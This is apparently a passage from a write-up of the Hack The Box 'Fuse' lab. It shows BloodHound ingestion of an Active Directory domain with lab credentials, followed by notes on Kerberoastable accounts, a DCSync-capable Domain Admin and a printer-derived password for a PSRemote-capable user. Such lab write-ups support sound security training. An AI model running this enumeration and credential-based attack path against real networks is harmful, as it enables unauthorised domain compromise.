Bloodhound
┌──(kali㉿kali)-[~/…/htb/labs/fuse/bloodhound]
└─$ bloodhound-python -u bnielson@fabricorp.local -p Qwer1234 -ns $IP -d FABRICORP.LOCAL -dc fuse.fabricorp.local --zip -c All
info: Found AD domain: fabricorp.local
info: Connecting to LDAP server: fuse.fabricorp.local
info: Found 1 domains
info: Found 1 domains in the forest
info: Found 1 computers
info: Connecting to LDAP server: fuse.fabricorp.local
info: Found 16 users
info: Found 54 groups
info: Found 0 trusts
info: Starting computer enumeration with 10 workers
info: Querying computer: Fuse.fabricorp.local
info: Done in 00M 06S
info: Compressing output into 20230202160051_bloodhound.zip
Using valid domain credentials from multiple sources, I can authenticate and perform Bloodhound Ingestion
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ sudo neo4j console
directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /usr/share/neo4j/run
Starting Neo4j.
2023-02-02 14:59:26.532+0000 INFO Starting...
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ bloodhound
Firing up neo4j and bloodhound
Upload complete
Kerberoasting
Only Kerberoast-able account is
KRBTGT
which is disabled and set by default, so no use
sthompson
The
sthompson
user is also part of the Domain Admins
group and has DC SYNC privilege over the whole domain
svc-print
The
svc-print
user has an extensive transitive group membership that allows the user to PSRemote to the target system.
Thankfully, the CLEARTEXT password extracted from the printer belongs to the svc-print
user